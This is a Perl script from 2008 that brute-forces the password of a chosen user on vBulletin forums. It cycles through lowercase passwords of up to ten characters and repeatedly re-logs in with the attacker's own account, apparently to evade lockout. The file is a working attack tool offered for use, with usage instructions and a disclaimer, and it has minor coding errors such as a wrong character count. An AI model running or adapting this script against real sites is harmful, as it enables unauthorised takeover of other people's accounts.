#!/usr/bin/perl

use IO::Socket;
use LWP::UserAgent;
use HTTP::Cookies;
use Time::HiRes qw(gettimeofday);

$host = $ARGV[0];
$usern = $ARGV[1];
$passw = $ARGV[2];
$uname = $ARGV[3];
$url = "http://".$host;
$alpha = "abcdefghijklmnopqrstuvwxyz"; #charset
$charcount = 24; #number of chars in $alpha
$dbgtmr = "1"; #Intervall of showing the current speed + lastpassword in seconds.
$count = 0;
$logins = 0;
$minchars = 1; #min chars
$maxchars = 10; #max chars

print q(
##################################################  #########
#                vBulletin brute forcer                   #
#              http://www.unnamedone.com                  #
#               brian_denys@hotmail.com                   #
#                  09 - April - 2008                      #
################## Coded By UnnamedOne ####################
);

if (@ARGV < 4)
{
    print " #  I am not responsible for anything that you do with this!\n";
    print " #  This has been tested on vBulletin 3.6.8 and 3.7.0!\n";
    print " #  usage : vbrute.pl [host & path] [user] [pass] [target]\n";
    print " #  E.g : vbrute.pl www.milw0rm.com/vBulletin3.6.8/ UnnamedOne MyPass str0ke\n";
    exit();
}

fakelogin();
for(my $t=$minchars;$t<=$maxchars;$t++)
{
    crack($t);
}

sub fakelogin {
    $xplr = LWP::UserAgent->new() or die;
    $cookie_jarr = HTTP::Cookies->new();
    $xplr->cookie_jar( $cookie_jarr );
    $resr = $xplr->post($url.'login.php?do=login',
    Content => [
    "vb_login_username"   => "$usern",
    "vb_login_password"   => "$passw",
    "do"      => "login",
    ],);
    if($cookie_jarr->as_string =~ /IDstack=(.*?);/) {
       #Do nothing..
    }
    else
    {
       #print $cookie_jarr->as_string;
       print "Forum not vulnerable or wrong username / password.\n";
       exit();
    }
}

sub crack {
    $xpl = LWP::UserAgent->new() or die;
    $cookie_jar = HTTP::Cookies->new();
    $CharSet = shift;
    @RawString = ();
    for (my $i =0;$i<$CharSet;$i++) {
       $RawString[i] = 0;
    }
    $Start = gettimeofday();
    do {
       for (my $i =0;$i<$CharSet;$i++)
       {
          if ($RawString[$i] > length($alpha)-1) {
             if ($i==$CharSet-1) {
                $cnt = 0;
                return false;
             }
             $RawString[$i+1]++;
             $RawString[$i]=0;
          }
       }
       $ret = "";
       for (my $i =0;$i<$CharSet;$i++) {
          $ret = $ret . substr($alpha,$RawString[$i],1);
       }
       $count++;
       if($count == 4) {
          fakelogin();
          $count = 0;
       }
       $xpl->cookie_jar( $cookie_jar );
       $res = $xpl->post($url.'login.php?do=login',
       Content => [
       "vb_login_username"   => "$uname",
       "vb_login_password"   => "$ret",
       "do"      => "login",
       ],);
       $cnt++;
       $Stop = gettimeofday();
       if ($Stop-$Start>$dbgtmr) {
          $cnt = int($cnt/$dbgtmr);
          $Start = gettimeofday();
       }
       $logins++;
       system("clear");
       $pro = ($logins / ($charcount * $maxchars));
       print "Current password: $ret\n";
       print "Login attempts: $logins\n";
       print "Cracking speed: $cnt passwords/sec\n";
       print "$pro% finished.\n";
       $cnt = 0;
       if($cookie_jar->as_string =~ /IDstack=(.*?);/) {
          print "Password cracked! => $ret\n";
          exit();

       }
       $RawString[0]++;
    }while($RawString[$CharSet-1]<length($alpha));
}